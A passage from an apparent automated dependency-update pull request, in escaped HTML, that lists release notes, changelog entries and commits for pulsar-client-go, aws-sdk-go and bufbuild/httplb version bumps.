\u003ccode\u003eReconsumeLater\u003c/code\u003e on regex consumer (\u003ca href=\"https://redirect.github.com/apache/pulsar-client-go/pull/1456\"\u003e#1456\u003c/a\u003e) by \u003ca href=\"https://github.com/jordanfitz\"\u003e\u003ccode\u003e@​jordanfitz\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[feat] Add support for issuer URL override in client credentials flow (\u003ca href=\"https://redirect.github.com/apache/pulsar-client-go/pull/1463\"\u003e#1463\u003c/a\u003e) by \u003ca href=\"https://github.com/freeznet\"\u003e\u003ccode\u003e@​freeznet\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[feat] Add removal methods for namespace policies (\u003ca href=\"https://redirect.github.com/apache/pulsar-client-go/pull/1465\"\u003e#1465\u003c/a\u003e) by \u003ca href=\"https://github.com/freeznet\"\u003e\u003ccode\u003e@​freeznet\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[feat] Add support for retrieving schema compatibility strategy with options (\u003ca href=\"https://redirect.github.com/apache/pulsar-client-go/pull/1469\"\u003e#1469\u003c/a\u003e) by \u003ca href=\"https://github.com/freeznet\"\u003e\u003ccode\u003e@​freeznet\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[feat] Add remove replication clusters topic API (\u003ca href=\"https://redirect.github.com/apache/pulsar-client-go/pull/1470\"\u003e#1470\u003c/a\u003e) by \u003ca href=\"https://github.com/freeznet\"\u003e\u003ccode\u003e@​freeznet\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[feat] Treat \u003ccode\u003eProducerBlockedQuotaExceededException\u003c/code\u003e as retryable and continue reconnecting (\u003ca href=\"https://redirect.github.com/apache/pulsar-client-go/pull/1457\"\u003e#1457\u003c/a\u003e) by \u003ca href=\"https://github.com/geniusjoe\"\u003e\u003ccode\u003e@​geniusjoe\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[fix] Fix panic when messages size is 0 (\u003ca href=\"https://redirect.github.com/apache/pulsar-client-go/pull/1460\"\u003e#1460\u003c/a\u003e) by \u003ca href=\"https://github.com/unJASON\"\u003e\u003ccode\u003e@​unJASON\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[improve] Make service URL parsing compatible with Go 1.26 (\u003ca href=\"https://redirect.github.com/apache/pulsar-client-go/pull/1468\"\u003e#1468\u003c/a\u003e) by \u003ca href=\"https://github.com/nodece\"\u003e\u003ccode\u003e@​nodece\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[feat] Add scoped topic policies support (\u003ca href=\"https://redirect.github.com/apache/pulsar-client-go/pull/1471\"\u003e#1471\u003c/a\u003e) by \u003ca href=\"https://github.com/freeznet\"\u003e\u003ccode\u003e@​freeznet\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[fix] Fix consumer not consuming resent chunked messages (\u003ca href=\"https://redirect.github.com/apache/pulsar-client-go/pull/1464\"\u003e#1464\u003c/a\u003e) by \u003ca href=\"https://github.com/geniusjoe\"\u003e\u003ccode\u003e@​geniusjoe\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/codelipenghui\"\u003e\u003ccode\u003e@​codelipenghui\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/apache/pulsar-client-go/pull/1451\"\u003e#1451\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jordanfitz\"\u003e\u003ccode\u003e@​jordanfitz\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/apache/pulsar-client-go/pull/1456\"\u003e#1456\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/unJASON\"\u003e\u003ccode\u003e@​unJASON\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/apache/pulsar-client-go/pull/1460\"\u003e#1460\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev0.18.0\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e[improve] Modify the negativeACK structure to reduce memory overhead (\u003ca href=\"https://redirect.github.com/apache/pulsar-client-go/pull/1410\"\u003e#1410\u003c/a\u003e) by \u003ca href=\"https://github.com/gy-deng\"\u003e\u003ccode\u003e@​gy-deng\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[feat] Use -1 as sentinel value for namespace and topic admin commands (\u003ca href=\"https://redirect.github.com/apache/pulsar-client-go/pull/1430\"\u003e#1430\u003c/a\u003e) by \u003ca href=\"https://github.com/klevy-toast\"\u003e\u003ccode\u003e@​klevy-toast\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[fix] Update namespace \u0026amp; topic admin methods to return nil if unset (\u003ca href=\"https://redirect.github.com/apache/pulsar-client-go/pull/1433\"\u003e#1433\u003c/a\u003e) by \u003ca href=\"https://github.com/klevy-toast\"\u003e\u003ccode\u003e@​klevy-toast\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[test] Add unit test for unloading topic before consuming zero queue messages (\u003ca href=\"https://redirect.github.com/apache/pulsar-client-go/pull/1434\"\u003e#1434\u003c/a\u003e) by \u003ca href=\"https://github.com/crossoverJie\"\u003e\u003ccode\u003e@​crossoverJie\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[feat] Add timestamp to schema info (\u003ca href=\"https://redirect.github.com/apache/pulsar-client-go/pull/1436\"\u003e#1436\u003c/a\u003e) by \u003ca href=\"https://github.com/freeznet\"\u003e\u003ccode\u003e@​freeznet\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[fix] Fix the issue of unable to parse non-batch messages that with non-empty properties and empty payloads (\u003ca href=\"https://redirect.github.com/apache/pulsar-client-go/pull/1435\"\u003e#1435\u003c/a\u003e) by \u003ca href=\"https://github.com/coderzc\"\u003e\u003ccode\u003e@​coderzc\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[chore] Bump \u003ccode\u003egithub.com/dvsekhvalnov/jose2go\u003c/code\u003e from 1.6.0 to 1.7.0 (\u003ca href=\"https://redirect.github.com/apache/pulsar-client-go/pull/1439\"\u003e#1439\u003c/a\u003e) by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot]\u003c/li\u003e\n\u003cli\u003e[fix] Fix partition update failure causing existing producers to close (\u003ca href=\"https://redirect.github.com/apache/pulsar-client-go/pull/1437\"\u003e#1437\u003c/a\u003e) by \u003ca href=\"https://github.com/RobertIndie\"\u003e\u003ccode\u003e@​RobertIndie\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[feat] Support reloading OAuth2 key file (\u003ca href=\"https://redirect.github.com/apache/pulsar-client-go/pull/1441\"\u003e#1441\u003c/a\u003e) by \u003ca href=\"https://github.com/RobertIndie\"\u003e\u003ccode\u003e@​RobertIndie\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[chore] Bump \u003ccode\u003egolang.org/x/crypto\u003c/code\u003e from 0.36.0 to 0.45.0 (\u003ca href=\"https://redirect.github.com/apache/pulsar-client-go/pull/1440\"\u003e#1440\u003c/a\u003e) by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot]\u003c/li\u003e\n\u003cli\u003e[fix] Return error when the client transaction coordinator is nil to p… (\u003ca href=\"https://redirect.github.com/apache/pulsar-client-go/pull/1444\"\u003e#1444\u003c/a\u003e) by \u003ca href=\"https://github.com/thomas-bousquet\"\u003e\u003ccode\u003e@​thomas-bousquet\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[fix] Enhance zero queue consumer reconnection handling and message permit management (\u003ca href=\"https://redirect.github.com/apache/pulsar-client-go/pull/1443\"\u003e#1443\u003c/a\u003e) by \u003ca href=\"https://github.com/crossoverJie\"\u003e\u003ccode\u003e@​crossoverJie\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/gy-deng\"\u003e\u003ccode\u003e@​gy-deng\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/apache/pulsar-client-go/pull/1410\"\u003e#1410\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/coderzc\"\u003e\u003ccode\u003e@​coderzc\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/apache/pulsar-client-go/pull/1435\"\u003e#1435\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev0.17.0\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/apache/pulsar-client-go/blob/master/CHANGELOG.md\"\u003egithub.com/apache/pulsar-client-go's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003ch1\u003ePulsar-client-go Changelog\u003c/h1\u003e\n\u003cp\u003eAll notable changes to this project will be documented in this file.\u003c/p\u003e\n\u003cp\u003e[0.19.0] 2026-04-07\u003c/p\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e[fix] Add JSON tag for \u003ccode\u003eUpdateAuthData\u003c/code\u003e in \u003ccode\u003eUpdateOptions\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/apache/pulsar-client-go/pull/1450\"\u003e#1450\u003c/a\u003e) by \u003ca href=\"https://github.com/freeznet\"\u003e\u003ccode\u003e@​freeznet\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[feat] Add \u003ccode\u003eRemovePersistence\u003c/code\u003e methods to namespace admin (\u003ca href=\"https://redirect.github.com/apache/pulsar-client-go/pull/1447\"\u003e#1447\u003c/a\u003e) by \u003ca href=\"https://github.com/freeznet\"\u003e\u003ccode\u003e@​freeznet\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[improve] Add support for PIP-431: creation and last publish timestamps (\u003ca href=\"https://redirect.github.com/apache/pulsar-client-go/pull/1451\"\u003e#1451\u003c/a\u003e) by \u003ca href=\"https://github.com/codelipenghui\"\u003e\u003ccode\u003e@​codelipenghui\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[docs] Update example code and add log initialization configurations (\u003ca href=\"https://redirect.github.com/apache/pulsar-client-go/pull/1449\"\u003e#1449\u003c/a\u003e) by \u003ca href=\"https://github.com/geniusjoe\"\u003e\u003ccode\u003e@​geniusjoe\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[docs] Update release process to link release and release notes to the Pulsar website (\u003ca href=\"https://redirect.github.com/apache/pulsar-client-go/pull/1453\"\u003e#1453\u003c/a\u003e) by \u003ca href=\"https://github.com/RobertIndie\"\u003e\u003ccode\u003e@​RobertIndie\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[improve] Change producer reconnect error logs to warn logs (\u003ca href=\"https://redirect.github.com/apache/pulsar-client-go/pull/1445\"\u003e#1445\u003c/a\u003e) by \u003ca href=\"https://github.com/RobertIndie\"\u003e\u003ccode\u003e@​RobertIndie\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[feat] Implement \u003ccode\u003eReconsumeLater\u003c/code\u003e on regex consumer (\u003ca href=\"https://redirect.github.com/apache/pulsar-client-go/pull/1456\"\u003e#1456\u003c/a\u003e) by \u003ca href=\"https://github.com/jordanfitz\"\u003e\u003ccode\u003e@​jordanfitz\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[feat] Add support for issuer URL override in client credentials flow (\u003ca href=\"https://redirect.github.com/apache/pulsar-client-go/pull/1463\"\u003e#1463\u003c/a\u003e) by \u003ca href=\"https://github.com/freeznet\"\u003e\u003ccode\u003e@​freeznet\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[feat] Add removal methods for namespace policies (\u003ca href=\"https://redirect.github.com/apache/pulsar-client-go/pull/1465\"\u003e#1465\u003c/a\u003e) by \u003ca href=\"https://github.com/freeznet\"\u003e\u003ccode\u003e@​freeznet\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[feat] Add support for retrieving schema compatibility strategy with options (\u003ca href=\"https://redirect.github.com/apache/pulsar-client-go/pull/1469\"\u003e#1469\u003c/a\u003e) by \u003ca href=\"https://github.com/freeznet\"\u003e\u003ccode\u003e@​freeznet\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[feat] Add remove replication clusters topic API (\u003ca href=\"https://redirect.github.com/apache/pulsar-client-go/pull/1470\"\u003e#1470\u003c/a\u003e) by \u003ca href=\"https://github.com/freeznet\"\u003e\u003ccode\u003e@​freeznet\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[feat] Treat \u003ccode\u003eProducerBlockedQuotaExceededException\u003c/code\u003e as retryable and continue reconnecting (\u003ca href=\"https://redirect.github.com/apache/pulsar-client-go/pull/1457\"\u003e#1457\u003c/a\u003e) by \u003ca href=\"https://github.com/geniusjoe\"\u003e\u003ccode\u003e@​geniusjoe\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[fix] Fix panic when messages size is 0 (\u003ca href=\"https://redirect.github.com/apache/pulsar-client-go/pull/1460\"\u003e#1460\u003c/a\u003e) by \u003ca href=\"https://github.com/unJASON\"\u003e\u003ccode\u003e@​unJASON\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[improve] Make service URL parsing compatible with Go 1.26 (\u003ca href=\"https://redirect.github.com/apache/pulsar-client-go/pull/1468\"\u003e#1468\u003c/a\u003e) by \u003ca href=\"https://github.com/nodece\"\u003e\u003ccode\u003e@​nodece\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[feat] Add scoped topic policies support (\u003ca href=\"https://redirect.github.com/apache/pulsar-client-go/pull/1471\"\u003e#1471\u003c/a\u003e) by \u003ca href=\"https://github.com/freeznet\"\u003e\u003ccode\u003e@​freeznet\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[fix] Fix consumer not consuming resent chunked messages (\u003ca href=\"https://redirect.github.com/apache/pulsar-client-go/pull/1464\"\u003e#1464\u003c/a\u003e) by \u003ca href=\"https://github.com/geniusjoe\"\u003e\u003ccode\u003e@​geniusjoe\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/codelipenghui\"\u003e\u003ccode\u003e@​codelipenghui\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/apache/pulsar-client-go/pull/1451\"\u003e#1451\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jordanfitz\"\u003e\u003ccode\u003e@​jordanfitz\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/apache/pulsar-client-go/pull/1456\"\u003e#1456\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/apache/pulsar-client-go/commit/593fccfbd82b80afed335727963b6f5730581491\"\u003e\u003ccode\u003e593fccf\u003c/code\u003e\u003c/a\u003e [Issue 1446][Consumer] Fix consumer can't consume resent chunked messages (\u003ca href=\"https://redirect.github.com/apache/pulsar-client-go/issues/1\"\u003e#1\u003c/a\u003e...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/apache/pulsar-client-go/commit/e7eb92f148f55fbb437d499611f509eb55d72113\"\u003e\u003ccode\u003ee7eb92f\u003c/code\u003e\u003c/a\u003e feat(pulsaradmin): add scoped topic policies support (\u003ca href=\"https://redirect.github.com/apache/pulsar-client-go/issues/1471\"\u003e#1471\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/apache/pulsar-client-go/commit/d0db3403023d3390392db8562741691482af6df4\"\u003e\u003ccode\u003ed0db340\u003c/code\u003e\u003c/a\u003e improve: service URL parsing compatible with Go 1.26 (\u003ca href=\"https://redirect.github.com/apache/pulsar-client-go/issues/1468\"\u003e#1468\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/apache/pulsar-client-go/commit/15bd915fcf0af108c533f17dd4fe50f81e1e5a15\"\u003e\u003ccode\u003e15bd915\u003c/code\u003e\u003c/a\u003e fix(consumer): fix panic when messages size is 0 (\u003ca href=\"https://redirect.github.com/apache/pulsar-client-go/issues/1460\"\u003e#1460\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/apache/pulsar-client-go/commit/d7fafb5a559a1bcd744dff2c3fb2493884621bbd\"\u003e\u003ccode\u003ed7fafb5\u003c/code\u003e\u003c/a\u003e feat: regard ProducerBlockedQuotaExceededException as retryable exception to ...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/apache/pulsar-client-go/commit/70d34c965f3961cbd77f517af46d24b706612be6\"\u003e\u003ccode\u003e70d34c9\u003c/code\u003e\u003c/a\u003e admin: add remove replication clusters topic API (\u003ca href=\"https://redirect.github.com/apache/pulsar-client-go/issues/1470\"\u003e#1470\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/apache/pulsar-client-go/commit/7832a7da85158d86a2bf56f9a6eaf7eebe5bde50\"\u003e\u003ccode\u003e7832a7d\u003c/code\u003e\u003c/a\u003e feat(topic): add support for retrieving applied schema compatibility strategy...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/apache/pulsar-client-go/commit/3564674615ac147075a299aafa8101ccbc2846cf\"\u003e\u003ccode\u003e3564674\u003c/code\u003e\u003c/a\u003e feat(namespace): add removal methods for namespace policies (\u003ca href=\"https://redirect.github.com/apache/pulsar-client-go/issues/1465\"\u003e#1465\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/apache/pulsar-client-go/commit/203dcf1cd22dbcf853c2a06c52dee3c4e1eba92b\"\u003e\u003ccode\u003e203dcf1\u003c/code\u003e\u003c/a\u003e feat(oauth2): add support for issuer URL override in client credentials flow ...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/apache/pulsar-client-go/commit/cc185904de7b42dc97193188874ce6605ff2d560\"\u003e\u003ccode\u003ecc18590\u003c/code\u003e\u003c/a\u003e Implement ReconsumeLater on regex consumer (\u003ca href=\"https://redirect.github.com/apache/pulsar-client-go/issues/1456\"\u003e#1456\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/apache/pulsar-client-go/compare/v0.14.0...v0.19.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-sdk-go` from 1.55.6 to 1.55.8\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/aws/aws-sdk-go/releases\"\u003egithub.com/aws/aws-sdk-go's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003eRelease v1.55.8 (2025-07-31)\u003c/h1\u003e\n\u003ch3\u003eSDK Features\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eMark the module and all packages as deprecated.\n\u003cul\u003e\n\u003cli\u003eThis SDK has entered end-of-support.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease v1.55.7 (2025-04-22)\u003c/h1\u003e\n\u003ch3\u003eSDK Bugs\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003eservice/s3/s3manager\u003c/code\u003e: Abort multipart download if object is modified during download\n\u003cul\u003e\n\u003cli\u003eFixes \u003ca href=\"https://redirect.github.com/aws/aws-sdk-go/issues/4986\"\u003e4986\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/070853e88d22854d2355c2543d0958a5f76ad407\"\u003e\u003ccode\u003e070853e\u003c/code\u003e\u003c/a\u003e release v1.55.8 (2025-07-31)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/bb0168ecfa52f8809b27912ded94edafaa019512\"\u003e\u003ccode\u003ebb0168e\u003c/code\u003e\u003c/a\u003e Add deprecation warnings everywhere and remove some README content\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/7ce44f3b563e6c00488bc9c81fb12ef232d72d93\"\u003e\u003ccode\u003e7ce44f3\u003c/code\u003e\u003c/a\u003e aws\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/6d9a26d85968c06f7e83b3233c5454b93c1ccfd8\"\u003e\u003ccode\u003e6d9a26d\u003c/code\u003e\u003c/a\u003e remove doc issue tmpl\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/239002f260fd543fe03fbd154d3033777d2bcd30\"\u003e\u003ccode\u003e239002f\u003c/code\u003e\u003c/a\u003e deprecate service packages and HLLs\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/70c4177b8fdf98fa35e7286fd7881276d7490540\"\u003e\u003ccode\u003e70c4177\u003c/code\u003e\u003c/a\u003e deprecate main runtime packages\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/bbdd4e9bc5e4f2795f25486b84b202d689efc632\"\u003e\u003ccode\u003ebbdd4e9\u003c/code\u003e\u003c/a\u003e deprecate\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/163aada692ed32951f979aacf452ded4c03b8a7c\"\u003e\u003ccode\u003e163aada\u003c/code\u003e\u003c/a\u003e release v1.55.7 (2025-04-22) (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go/issues/5346\"\u003e#5346\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/9eb2bfd2f949fc81b96cee6b5aae6d9b84abea75\"\u003e\u003ccode\u003e9eb2bfd\u003c/code\u003e\u003c/a\u003e Abort multi part download if the object is modified during download\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/8d203ccff393340d080be0417d091cc60354449b\"\u003e\u003ccode\u003e8d203cc\u003c/code\u003e\u003c/a\u003e Update bug-report.yml\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/aws/aws-sdk-go/compare/v1.55.6...v1.55.8\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/bufbuild/httplb` from 0.3.1 to 0.4.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/bufbuild/httplb/releases\"\u003egithub.com/bufbuild/httplb's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev0.4.1\u003c/h2\u003e\n\u003ch2\u003eBugfixes\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMake it safe for users to wrap embedded client's \u003ccode\u003eTransport\u003c/code\u003e with their own middleware by \u003ca href=\"https://github.com/jhump\"\u003e\u003ccode\u003e@​jhump\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bufbuild/httplb/issues/79\"\u003e#79\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix issue where health check loop could prematurely exit due to incorrect context usage by \u003ca href=\"https://github.com/anuraaga\"\u003e\u003ccode\u003e@​anuraaga\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bufbuild/httplb/issues/80\"\u003e#80\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/anuraaga\"\u003e\u003ccode\u003e@​anuraaga\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/bufbuild/httplb/issues/80\"\u003e#80\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/bufbuild/httplb/compare/v0.4.0...v0.4.1\"\u003ehttps://github.com/bufbuild/httplb/compare/v0.4.0...v0.4.1\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev0.4.0\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003ch3\u003eEnhancements\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdd new \u003ccode\u003eWithDisableCompression\u003c/code\u003e configuration by \u003ca href=\"https://github.com/mattrobenolt\"\u003e\u003ccode\u003e@​mattrobenolt\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bufbuild/httplb/issues/71\"\u003e#71\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUse faster random number generation by \u003ca href=\"https://github.com/jhump\"\u003e\u003ccode\u003e@​jhump\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bufbuild/httplb/issues/77\"\u003e#77\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eBugfixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eCorrect usage of timers for library updates in Go 1.23 by \u003ca href=\"https://github.com/glowfall\"\u003e\u003ccode\u003e@​glowfall\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bufbuild/httplb/issues/74\"\u003e#74\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eOther Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eUse standard library support for H2C when building with Go 1.24 by \u003ca href=\"https://github.com/jhump\"\u003e\u003ccode\u003e@​jhump\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bufbuild/httplb/issues/76\"\u003e#76\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mattrobenolt\"\u003e\u003ccode\u003e@​mattrobenolt\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/bufbuild/httplb/issues/71\"\u003e#71\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/glowfall\"\u003e\u003ccode\u003e@​glowfall\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/bufbuild/httplb/issues/74\"\u003e#74\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/bufbuild/httplb/compare/v0.3.1...v0.4.0\"\u003ehttps://github.com/bufbuild/httplb/compare/v0.3.1...v0.4.0\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/bufbuild/httplb/commit/3d0179892278ea40b46036eb8398d8fe8bd11fcb\"\u003e\u003ccode\u003e3d01798\u003c/code\u003e\u003c/a\u003e Fix health check loop closes on probe timeout (\u003ca href=\"https://redirect.github.com/bufbuild/httplb/issues/80\"\u003e#80\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca 